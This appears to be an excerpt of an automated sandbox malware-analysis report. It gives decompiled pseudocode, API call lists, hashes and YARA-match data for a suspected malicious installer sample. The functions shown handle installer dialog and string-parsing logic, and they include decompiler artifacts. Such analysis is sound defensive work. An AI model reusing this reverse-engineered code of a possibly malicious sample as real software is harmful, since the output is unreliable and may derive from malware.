                                                    control_flow_graph 133 404ced-404d39 GetDlgItem * 2 134 404f5a-404f61 133->134 135 404d3f-404dd3 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 133->135 136 404f63-404f73 134->136 137 404f75 134->137 138 404de2-404de9 DeleteObject 135->138 139 404dd5-404de0 SendMessageW 135->139 140 404f78-404f81 136->140 137->140 141 404deb-404df3 138->141 139->138 142 404f83-404f86 140->142 143 404f8c-404f92 140->143 144 404df5-404df8 141->144 145 404e1c-404e20 141->145 142->143 146 405070-405077 142->146 149 404fa1-404fa8 143->149 150 404f94-404f9b 143->150 147 404dfa 144->147 148 404dfd-404e1a call 406234 SendMessageW * 2 144->148 145->141 151 404e22-404e4e call 4042d6 * 2 145->151 156 4050e8-4050f0 146->156 157 405079-40507f 146->157 147->148 148->145 153 404faa-404fad 149->153 154 40501d-405020 149->154 150->146 150->149 192 404e54-404e5a 151->192 193 404f19-404f2c GetWindowLongW SetWindowLongW 151->193 162 404fb8-404fcd call 404c3b 153->162 163 404faf-404fb6 153->163 154->146 158 405022-40502c 154->158 160 4050f2-4050f8 SendMessageW 156->160 161 4050fa-405101 156->161 165 4052d0-4052e2 call 40433d 157->165 166 405085-40508f 157->166 168 40503c-405046 158->168 169 40502e-40503a SendMessageW 158->169 160->161 170 405103-40510a 161->170 171 405135-40513c 161->171 162->154 191 404fcf-404fe0 162->191 163->154 163->162 166->165 174 405095-4050a4 SendMessageW 166->174 168->146 176 405048-405052 168->176 169->168 177 405113-40511a 170->177 178 40510c-40510d ImageList_Destroy 170->178 181 405292-405299 171->181 182 405142-40514e call 4011ef 171->182 174->165 183 4050aa-4050bb SendMessageW 174->183 187 405063-40506d 176->187 188 405054-405061 176->188 189 405123-40512f 177->189 190 40511c-40511d GlobalFree 177->190 178->177 181->165 186 40529b-4052a2 181->186 201 405150-405153 182->201 202 40515e-405161 182->202 184 4050c5-4050c7 183->184 185 4050bd-4050c3 183->185 196 4050c8-4050e1 call 401299 SendMessageW 184->196 185->184 185->196 186->165 197 4052a4-4052ce ShowWindow GetDlgItem ShowWindow 186->197 187->146 188->146 189->171 190->189 191->154 199 404fe2-404fe4 191->199 200 404e5d-404e64 192->200 198 404f32-404f36 193->198 196->156 197->165 204 404f50-404f58 call 40430b 198->204 205 404f38-404f4b ShowWindow call 40430b 198->205 206 404fe6-404fed 199->206 207 404ff7 199->207 208 404efa-404f0d 200->208 209 404e6a-404e92 200->209 213 405155 201->213 214 405156-405159 call 404cbb 201->214 217 4051a2-4051c6 call 4011ef 202->217 218 405163-40517c call 4012e2 call 401299 202->218 204->134 205->165 221 404ff3-404ff5 206->221 222 404fef-404ff1 206->222 212 404ffa-405016 call 40117d 207->212 208->200 216 404f13-404f17 208->216 210 404e94-404eca SendMessageW 209->210 211 404ecc-404ece 209->211 210->208 223 404ed0-404edf SendMessageW 211->223 224 404ee1-404ef7 SendMessageW 211->224 212->154 213->214 214->202 216->193 216->198 235 405268-40527c InvalidateRect 217->235 236 4051cc 217->236 240 40518c-40519b SendMessageW 218->240 241 40517e-405184 218->241 221->212 222->212 223->208 224->208 235->181 239 40527e-40528d call 404c0e call 404bf6 235->239 237 4051cf-4051da 236->237 242 405250-405262 237->242 243 4051dc-4051eb 237->243 239->181 240->217 247 405186 241->247 248 405187-40518a 241->248 242->235 242->237 245 4051ed-4051fa 243->245 246 4051fe-405201 243->246 245->246 251 405203-405206 246->251 252 405208-405211 246->252 247->248 248->240 248->241 253 405216-40524e SendMessageW * 2 251->253 252->253 254 405213 252->254 253->242 254->253
                                                    C-Code - Quality: 96%
                                                    			E00404CED(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed char* _v28;
				long _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				signed char* _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t192;
				intOrPtr _t195;
				long _t201;
				signed int _t205;
				signed int _t216;
				void* _t219;
				void* _t220;
				int _t226;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t239;
				signed int _t241;
				signed char _t242;
				signed char _t248;
				void* _t252;
				void* _t254;
				signed char* _t270;
				signed char _t271;
				long _t273;
				long _t276;
				int _t279;
				int _t282;
				signed int _t283;
				long _t284;
				signed int _t287;
				signed int _t294;
				signed char* _t302;
				struct HWND__* _t306;
				int _t307;
				signed int* _t308;
				int _t309;
				long _t310;
				signed int _t311;
				void* _t313;
				long _t314;
				int _t315;
				signed int _t316;
				void* _t318;

				_t306 = _a4;
				_v12 = GetDlgItem(_t306, 0x3f9);
				_v8 = GetDlgItem(_t306, 0x408);
				_t318 = SendMessageW;
				_v20 =  *0x42a268;
				_t282 = 0;
				_v24 =  *0x42a250 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t285 = _a16;
					} else {
						_a12 = _t282;
						_t285 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t285;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t285 + 4)) == 0x408) {
							if(( *0x42a259 & 0x00000002) != 0) {
								L41:
								if(_v16 != _t282) {
									_t231 = _v16;
									if( *((intOrPtr*)(_t231 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, _t282,  *(_t231 + 0x5c)); // executed
									}
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe39) {
										_t285 = _v20;
										_t233 =  *(_t232 + 0x5c);
										if( *((intOrPtr*)(_t232 + 0xc)) != 2) {
											 *(_t233 * 0x818 + _t285 + 8) =  *(_t233 * 0x818 + _t285 + 8) & 0xffffffdf;
										} else {
											 *(_t233 * 0x818 + _t285 + 8) =  *(_t233 * 0x818 + _t285 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t285 = 0 | _a8 != 0x00000413;
								_t239 = E00404C3B(_v8, _a8 != 0x413);
								_t311 = _t239;
								if(_t311 >= _t282) {
									_t88 = _v20 + 8; // 0x8
									_t285 = _t239 * 0x818 + _t88;
									_t241 =  *_t285;
									if((_t241 & 0x00000010) == 0) {
										if((_t241 & 0x00000040) == 0) {
											_t242 = _t241 ^ 0x00000001;
										} else {
											_t248 = _t241 ^ 0x00000080;
											if(_t248 >= 0) {
												_t242 = _t248 & 0x000000fe;
											} else {
												_t242 = _t248 | 0x00000001;
											}
										}
										 *_t285 = _t242;
										E0040117D(_t311);
										_a12 = _t311 + 1;
										_a16 =  !( *0x42a258) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t285 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, _t282, _t282);
							}
							if(_a8 == 0x40b) {
								_t219 =  *0x42370c;
								if(_t219 != _t282) {
									ImageList_Destroy(_t219);
								}
								_t220 =  *0x423720;
								if(_t220 != _t282) {
									GlobalFree(_t220);
								}
								 *0x42370c = _t282;
								 *0x423720 = _t282;
								 *0x42a2a0 = _t282;
							}
							if(_a8 != 0x40f) {
								L88:
								if(_a8 == 0x420 && ( *0x42a259 & 0x00000001) != 0) {
									_t307 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t307);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t307);
								}
								goto L91;
							} else {
								E004011EF(_t285, _t282, _t282);
								_t192 = _a12;
								if(_t192 != _t282) {
									if(_t192 != 0xffffffff) {
										_t192 = _t192 - 1;
									}
									_push(_t192);
									_push(8);
									E00404CBB();
								}
								if(_a16 == _t282) {
									L75:
									E004011EF(_t285, _t282, _t282);
									_v32 =  *0x423720;
									_t195 =  *0x42a268;
									_v60 = 0xf030;
									_v20 = _t282;
									if( *0x42a26c <= _t282) {
										L86:
										InvalidateRect(_v8, _t282, 1);
										if( *((intOrPtr*)( *0x42921c + 0x10)) != _t282) {
											E00404BF6(0x3ff, 0xfffffffb, E00404C0E(5));
										}
										goto L88;
									}
									_t308 = _t195 + 8;
									do {
										_t201 =  *((intOrPtr*)(_v32 + _v20 * 4));
										if(_t201 != _t282) {
											_t287 =  *_t308;
											_v68 = _t201;
											_v72 = 8;
											if((_t287 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t308[4]);
												_t308[0] = _t308[0] & 0x000000fe;
											}
											if((_t287 & 0x00000040) == 0) {
												_t205 = (_t287 & 0x00000001) + 1;
												if((_t287 & 0x00000010) != 0) {
													_t205 = _t205 + 3;
												}
											} else {
												_t205 = 3;
											}
											_v64 = (_t205 << 0x0000000b | _t287 & 0x00000008) + (_t205 << 0x0000000b | _t287 & 0x00000008) | _t287 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t287 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageW(_v8, 0x113f, _t282,  &_v72);
										}
										_v20 = _v20 + 1;
										_t308 =  &(_t308[0x206]);
									} while (_v20 <  *0x42a26c);
									goto L86;
								} else {
									_t309 = E004012E2( *0x423720);
									E00401299(_t309);
									_t216 = 0;
									_t285 = 0;
									if(_t309 <= _t282) {
										L74:
										SendMessageW(_v12, 0x14e, _t285, _t282);
										_a16 = _t309;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v24 + _t216 * 4)) != _t282) {
											_t285 = _t285 + 1;
										}
										_t216 = _t216 + 1;
									} while (_t216 < _t309);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L91;
						} else {
							_t226 = SendMessageW(_v12, 0x147, _t282, _t282);
							if(_t226 == 0xffffffff) {
								goto L91;
							}
							_t310 = SendMessageW(_v12, 0x150, _t226, _t282);
							if(_t310 == 0xffffffff ||  *((intOrPtr*)(_v24 + _t310 * 4)) == _t282) {
								_t310 = 0x20;
							}
							E00401299(_t310);
							SendMessageW(_a4, 0x420, _t282, _t310);
							_a12 = _a12 | 0xffffffff;
							_a16 = _t282;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v32 = 0;
					_v16 = 2;
					 *0x42a2a0 = _t306;
					 *0x423720 = GlobalAlloc(0x40,  *0x42a26c << 2);
					_t252 = LoadBitmapW( *0x42a240, 0x6e);
					 *0x423714 =  *0x423714 | 0xffffffff;
					_t313 = _t252;
					 *0x42371c = SetWindowLongW(_v8, 0xfffffffc, E004052E5);
					_t254 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42370c = _t254;
					ImageList_AddMasked(_t254, _t313, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x42370c);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t313);
					_t314 = 0;
					do {
						_t260 =  *((intOrPtr*)(_v24 + _t314 * 4));
						if( *((intOrPtr*)(_v24 + _t314 * 4)) != _t282) {
							if(_t314 != 0x20) {
								_v16 = _t282;
							}
							_t279 = SendMessageW(_v12, 0x143, _t282, E00406234(_t282, _t314, _t318, _t282, _t260)); // executed
							SendMessageW(_v12, 0x151, _t279, _t314);
						}
						_t314 = _t314 + 1;
					} while (_t314 < 0x21);
					_t315 = _a16;
					_t283 = _v16;
					_push( *((intOrPtr*)(_t315 + 0x30 + _t283 * 4)));
					_push(0x15);
					E004042D6(_a4);
					_push( *((intOrPtr*)(_t315 + 0x34 + _t283 * 4)));
					_push(0x16);
					E004042D6(_a4);
					_t316 = 0;
					_t284 = 0;
					if( *0x42a26c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t302 = _v20 + 8;
						_v28 = _t302;
						do {
							_t270 =  &(_t302[0x10]);
							if( *_t270 != 0) {
								_v60 = _t270;
								_t271 =  *_t302;
								_t294 = 0x20;
								_v84 = _t284;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t294;
								_v40 = _t316;
								_v68 = _t271 & _t294;
								if((_t271 & 0x00000002) == 0) {
									if((_t271 & 0x00000004) == 0) {
										_t273 = SendMessageW(_v8, 0x1132, 0,  &_v84); // executed
										 *( *0x423720 + _t316 * 4) = _t273;
									} else {
										_t284 = SendMessageW(_v8, 0x110a, 3, _t284);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t276 = SendMessageW(_v8, 0x1132, 0,  &_v84);
									_v32 = 1;
									 *( *0x423720 + _t316 * 4) = _t276;
									_t284 =  *( *0x423720 + _t316 * 4);
								}
							}
							_t316 = _t316 + 1;
							_t302 =  &(_v28[0x818]);
							_v28 = _t302;
						} while (_t316 <  *0x42a26c);
						if(_v32 != 0) {
							L20:
							if(_v16 != 0) {
								E0040430B(_v8);
								_t282 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E0040430B(_v12);
								L91:
								return E0040433D(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}






























































                                                    0x00404cfc
                                                    0x00404d0d
                                                    0x00404d12
                                                    0x00404d1a
                                                    0x00404d20
                                                    0x00404d28
                                                    0x00404d36
                                                    0x00404d39
                                                    0x00404f5a
                                                    0x00404f61
                                                    0x00404f75
                                                    0x00404f63
                                                    0x00404f65
                                                    0x00404f68
                                                    0x00404f69
                                                    0x00404f70
                                                    0x00404f70
                                                    0x00404f81
                                                    0x00404f8f
                                                    0x00404f92
                                                    0x00404fa8
                                                    0x0040501d
                                                    0x00405020
                                                    0x00405022
                                                    0x0040502c
                                                    0x0040503a
                                                    0x0040503a
                                                    0x0040503c
                                                    0x00405046
                                                    0x0040504c
                                                    0x0040504f
                                                    0x00405052
                                                    0x0040506d
                                                    0x00405054
                                                    0x0040505e
                                                    0x0040505e
                                                    0x00405052
                                                    0x00405046
                                                    0x00000000
                                                    0x00405020
                                                    0x00404fad
                                                    0x00404fb8
                                                    0x00404fbd
                                                    0x00404fc4
                                                    0x00404fc9
                                                    0x00404fcd
                                                    0x00404fd8
                                                    0x00404fd8
                                                    0x00404fdc
                                                    0x00404fe0
                                                    0x00404fe4
                                                    0x00404ff7
                                                    0x00404fe6
                                                    0x00404fe6
                                                    0x00404fed
                                                    0x00404ff3
                                                    0x00404fef
                                                    0x00404fef
                                                    0x00404fef
                                                    0x00404fed
                                                    0x00404ffb
                                                    0x00404ffd
                                                    0x00405010
                                                    0x00405013
                                                    0x00405016
                                                    0x00405016
                                                    0x00404fe0
                                                    0x00000000
                                                    0x00404fcd
                                                    0x00404faf
                                                    0x00404fb6
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00405070
                                                    0x00405070
                                                    0x00405077
                                                    0x004050e8
                                                    0x004050f0
                                                    0x004050f8
                                                    0x004050f8
                                                    0x00405101
                                                    0x00405103
                                                    0x0040510a
                                                    0x0040510d
                                                    0x0040510d
                                                    0x00405113
                                                    0x0040511a
                                                    0x0040511d
                                                    0x0040511d
                                                    0x00405123
                                                    0x00405129
                                                    0x0040512f
                                                    0x0040512f
                                                    0x0040513c
                                                    0x00405292
                                                    0x00405299
                                                    0x004052b6
                                                    0x004052bc
                                                    0x004052ce
                                                    0x004052ce
                                                    0x00000000
                                                    0x00405142
                                                    0x00405144
                                                    0x00405149
                                                    0x0040514e
                                                    0x00405153
                                                    0x00405155
                                                    0x00405155
                                                    0x00405156
                                                    0x00405157
                                                    0x00405159
                                                    0x00405159
                                                    0x00405161
                                                    0x004051a2
                                                    0x004051a4
                                                    0x004051b4
                                                    0x004051b7
                                                    0x004051bc
                                                    0x004051c3
                                                    0x004051c6
                                                    0x00405268
                                                    0x0040526e
                                                    0x0040527c
                                                    0x0040528d
                                                    0x0040528d
                                                    0x00000000
                                                    0x0040527c
                                                    0x004051cc
                                                    0x004051cf
                                                    0x004051d5
                                                    0x004051da
                                                    0x004051dc
                                                    0x004051de
                                                    0x004051e4
                                                    0x004051eb
                                                    0x004051f0
                                                    0x004051f7
                                                    0x004051fa
                                                    0x004051fa
                                                    0x00405201
                                                    0x0040520d
                                                    0x00405211
                                                    0x00405213
                                                    0x00405213
                                                    0x00405203
                                                    0x00405205
                                                    0x00405205
                                                    0x00405233
                                                    0x0040523f
                                                    0x0040524e
                                                    0x0040524e
                                                    0x00405250
                                                    0x00405253
                                                    0x0040525c
                                                    0x00000000
                                                    0x00405163
                                                    0x0040516e
                                                    0x00405171
                                                    0x00405176
                                                    0x00405178
                                                    0x0040517c
                                                    0x0040518c
                                                    0x00405196
                                                    0x00405198
                                                    0x0040519b
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0040517e
                                                    0x0040517e
                                                    0x00405184
                                                    0x00405186
                                                    0x00405186
                                                    0x00405187
                                                    0x00405188
                                                    0x00000000
                                                    0x0040517e
                                                    0x00405161
                                                    0x0040513c
                                                    0x0040507f
                                                    0x00000000
                                                    0x00405095
                                                    0x0040509f
                                                    0x004050a4
                                                    0x00000000
                                                    0x00000000
                                                    0x004050b6
                                                    0x004050bb
                                                    0x004050c7
                                                    0x004050c7
                                                    0x004050c9
                                                    0x004050d8
                                                    0x004050da
                                                    0x004050de
                                                    0x004050e1
                                                    0x00000000
                                                    0x004050e1
                                                    0x0040507f
                                                    0x00404d3f
                                                    0x00404d44
                                                    0x00404d4d
                                                    0x00404d54
                                                    0x00404d62
                                                    0x00404d6d
                                                    0x00404d73
                                                    0x00404d81
                                                    0x00404d95
                                                    0x00404d9a
                                                    0x00404da7
                                                    0x00404dac
                                                    0x00404dc2
                                                    0x00404dd3
                                                    0x00404de0
                                                    0x00404de0
                                                    0x00404de3
                                                    0x00404de9
                                                    0x00404deb
                                                    0x00404dee
                                                    0x00404df3
                                                    0x00404df8
                                                    0x00404dfa
                                                    0x00404dfa
                                                    0x00404e0e
                                                    0x00404e1a
                                                    0x00404e1a
                                                    0x00404e1c
                                                    0x00404e1d
                                                    0x00404e22
                                                    0x00404e25
                                                    0x00404e28
                                                    0x00404e2c
                                                    0x00404e31
                                                    0x00404e36
                                                    0x00404e3a
                                                    0x00404e3f
                                                    0x00404e44
                                                    0x00404e46
                                                    0x00404e4e
                                                    0x00404f19
                                                    0x00404f2c
                                                    0x00000000
                                                    0x00404e54
                                                    0x00404e57
                                                    0x00404e5a
                                                    0x00404e5d
                                                    0x00404e5d
                                                    0x00404e64
                                                    0x00404e6a
                                                    0x00404e6d
                                                    0x00404e73
                                                    0x00404e74
                                                    0x00404e79
                                                    0x00404e82
                                                    0x00404e89
                                                    0x00404e8c
                                                    0x00404e8f
                                                    0x00404e92
                                                    0x00404ece
                                                    0x00404eef
                                                    0x00404ef7
                                                    0x00404ed0
                                                    0x00404edd
                                                    0x00404edd
                                                    0x00404e94
                                                    0x00404e97
                                                    0x00404ea6
                                                    0x00404eb0
                                                    0x00404eb8
                                                    0x00404ebf
                                                    0x00404ec7
                                                    0x00404ec7
                                                    0x00404e92
                                                    0x00404efd
                                                    0x00404efe
                                                    0x00404f0a
                                                    0x00404f0a
                                                    0x00404f17
                                                    0x00404f32
                                                    0x00404f36
                                                    0x00404f53
                                                    0x00404f58
                                                    0x00000000
                                                    0x00404f38
                                                    0x00404f3d
                                                    0x00404f46
                                                    0x004052d0
                                                    0x004052e2
                                                    0x004052e2
                                                    0x00404f36
                                                    0x00000000
                                                    0x00404f17
                                                    0x00404e4e

                                                    APIs
                                                    • GetDlgItem.USER32(?,000003F9), ref: 00404D05
                                                    • GetDlgItem.USER32(?,00000408), ref: 00404D10
                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00404D5A
                                                    • LoadBitmapW.USER32(0000006E), ref: 00404D6D
                                                    • SetWindowLongW.USER32(?,000000FC,004052E5), ref: 00404D86
                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D9A
                                                    • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404DAC
                                                    • SendMessageW.USER32(?,00001109,00000002), ref: 00404DC2
                                                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404DCE
                                                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404DE0
                                                    • DeleteObject.GDI32(00000000), ref: 00404DE3
                                                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404E0E
                                                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404E1A
                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404EB0
                                                    • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404EDB
                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404EEF
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00404F1E
                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404F2C
                                                    • ShowWindow.USER32(?,00000005), ref: 00404F3D
                                                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040503A
                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040509F
                                                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004050B4
                                                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004050D8
                                                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004050F8
                                                    • ImageList_Destroy.COMCTL32(?), ref: 0040510D
                                                    • GlobalFree.KERNEL32(?), ref: 0040511D
                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405196
                                                    • SendMessageW.USER32(?,00001102,?,?), ref: 0040523F
                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040524E
                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0040526E
                                                    • ShowWindow.USER32(?,00000000), ref: 004052BC
                                                    • GetDlgItem.USER32(?,000003FE), ref: 004052C7
                                                    • ShowWindow.USER32(00000000), ref: 004052CE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                    • String ID: $M$N
                                                    • API String ID: 1638840714-813528018
                                                    • Opcode ID: a20ec76394ec9aa9d7ee758541d4fa6294dbf0a1b8cf6e8fb4ee4d3cfcbb4640
                                                    • Instruction ID: fabf201a6726aaeed1f236dd7cd6744ceb795820712aa309ba6ddf90c5850425
                                                    • Opcode Fuzzy Hash: a20ec76394ec9aa9d7ee758541d4fa6294dbf0a1b8cf6e8fb4ee4d3cfcbb4640
                                                    • Instruction Fuzzy Hash: A4027DB0A00209EFDF209F54CD85AAE7BB5FB44314F50817AE610BA2E0D7799E52DF58
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 03337095 Relevance: 28.6, Strings: 20, Instructions: 3591COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39673477269.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_3320000_SecuriteInfo.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $%(X$$OP$%HWE$($-{Lj$/W~O$4m$8c}]$H3AU$MmbK$QrB$TU1$Vpo$Y84$_6p9$`M$hX ~$m/)h$mv'=$(K
                                                    • API String ID: 0-101090516
                                                    • Opcode ID: 74e7827f3c013f75ecb8a9d7e3bda11d08c7c0b5d7064a3e805ffade1b8e6f3c
                                                    • Instruction ID: c6a946aad8f55a4a0ab2dd9b29d7898b7134a311091f311e697262c96293a9c2
                                                    • Opcode Fuzzy Hash: 74e7827f3c013f75ecb8a9d7e3bda11d08c7c0b5d7064a3e805ffade1b8e6f3c
                                                    • Instruction Fuzzy Hash: 4D63DD71506345CFDB6A8E34C9A63DA3BB2EF23358F64419ECC869E665D3360647CB02
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 10001B18 Relevance: 20.0, APIs: 13, Instructions: 542stringmemoryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 95%
                                                    			E10001B18() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				WCHAR* _v44;
				signed int _v48;
				void* _v52;
				intOrPtr _v56;
				WCHAR* _t199;
				signed int _t202;
				void* _t204;
				void* _t206;
				WCHAR* _t208;
				void* _t216;
				struct HINSTANCE__* _t217;
				struct HINSTANCE__* _t218;
				struct HINSTANCE__* _t220;
				signed short _t222;
				struct HINSTANCE__* _t225;
				struct HINSTANCE__* _t227;
				void* _t228;
				intOrPtr* _t229;
				void* _t240;
				signed char _t241;
				signed int _t242;
				void* _t246;
				struct HINSTANCE__* _t248;
				void* _t249;
				signed int _t251;
				short* _t253;
				signed int _t259;
				void* _t260;
				signed int _t263;
				signed int _t266;
				signed int _t267;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				void* _t278;
				void* _t282;
				struct HINSTANCE__* _t284;
				signed int _t287;
				void _t288;
				signed int _t289;
				signed int _t301;
				signed int _t302;
				signed short _t308;
				signed int _t309;
				WCHAR* _t310;
				WCHAR* _t312;
				WCHAR* _t313;
				struct HINSTANCE__* _t314;
				void* _t316;
				signed int _t318;
				void* _t319;

				_t284 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = 0;
				_v8 = 0;
				_v40 = 0;
				_t319 = 0;
				_v48 = 0;
				_t199 = E1000121B();
				_v24 = _t199;
				_v28 = _t199;
				_v44 = E1000121B();
				_t309 = E10001243();
				_v52 = _t309;
				_v12 = _t309;
				while(1) {
					_t202 = _v32;
					_v56 = _t202;
					if(_t202 != _t284 && _t319 == _t284) {
						break;
					}
					_t308 =  *_t309;
					_t287 = _t308 & 0x0000ffff;
					_t204 = _t287 - _t284;
					if(_t204 == 0) {
						_t33 =  &_v32;
						 *_t33 = _v32 | 0xffffffff;
						__eflags =  *_t33;
						L17:
						_t206 = _v56 - _t284;
						if(_t206 == 0) {
							__eflags = _t319 - _t284;
							 *_v28 = _t284;
							if(_t319 == _t284) {
								_t246 = GlobalAlloc(0x40, 0x1ca4); // executed
								_t319 = _t246;
								 *(_t319 + 0x1010) = _t284;
								 *(_t319 + 0x1014) = _t284;
							}
							_t288 = _v36;
							_t43 = _t319 + 8; // 0x8
							_t208 = _t43;
							_t44 = _t319 + 0x808; // 0x808
							_t310 = _t44;
							 *_t319 = _t288;
							_t289 = _t288 - _t284;
							__eflags = _t289;
							 *_t208 = _t284;
							 *_t310 = _t284;
							 *(_t319 + 0x1008) = _t284;
							 *(_t319 + 0x100c) = _t284;
							 *(_t319 + 4) = _t284;
							if(_t289 == 0) {
								__eflags = _v28 - _v24;
								if(_v28 == _v24) {
									goto L40;
								}
								_t316 = 0;
								GlobalFree(_t319);
								_t319 = E10001311(_v24);
								__eflags = _t319 - _t284;
								if(_t319 == _t284) {
									goto L40;
								} else {
									goto L32;
								}
								while(1) {
									L32:
									_t240 =  *(_t319 + 0x1ca0);
									__eflags = _t240 - _t284;
									if(_t240 == _t284) {
										break;
									}
									_t316 = _t319;
									_t319 = _t240;
									__eflags = _t319 - _t284;
									if (_t319 != _t284) goto L32;
									asm("out dx, al");
								}
								__eflags = _t316 - _t284;
								if(_t316 != _t284) {
									 *(_t316 + 0x1ca0) = _t284;
								}
								_t241 =  *(_t319 + 0x1010);
								__eflags = _t241 & 0x00000008;
								if((_t241 & 0x00000008) == 0) {
									_t242 = _t241 | 0x00000002;
									__eflags = _t242;
									 *(_t319 + 0x1010) = _t242;
								} else {
									_t319 = E1000158F(_t319);
									 *(_t319 + 0x1010) =  *(_t319 + 0x1010) & 0xfffffff5;
								}
								goto L40;
							} else {
								_t301 = _t289 - 1;
								__eflags = _t301;
								if(_t301 == 0) {
									L28:
									lstrcpyW(_t208, _v44);
									L29:
									lstrcpyW(_t310, _v24);
									goto L40;
								}
								_t302 = _t301 - 1;
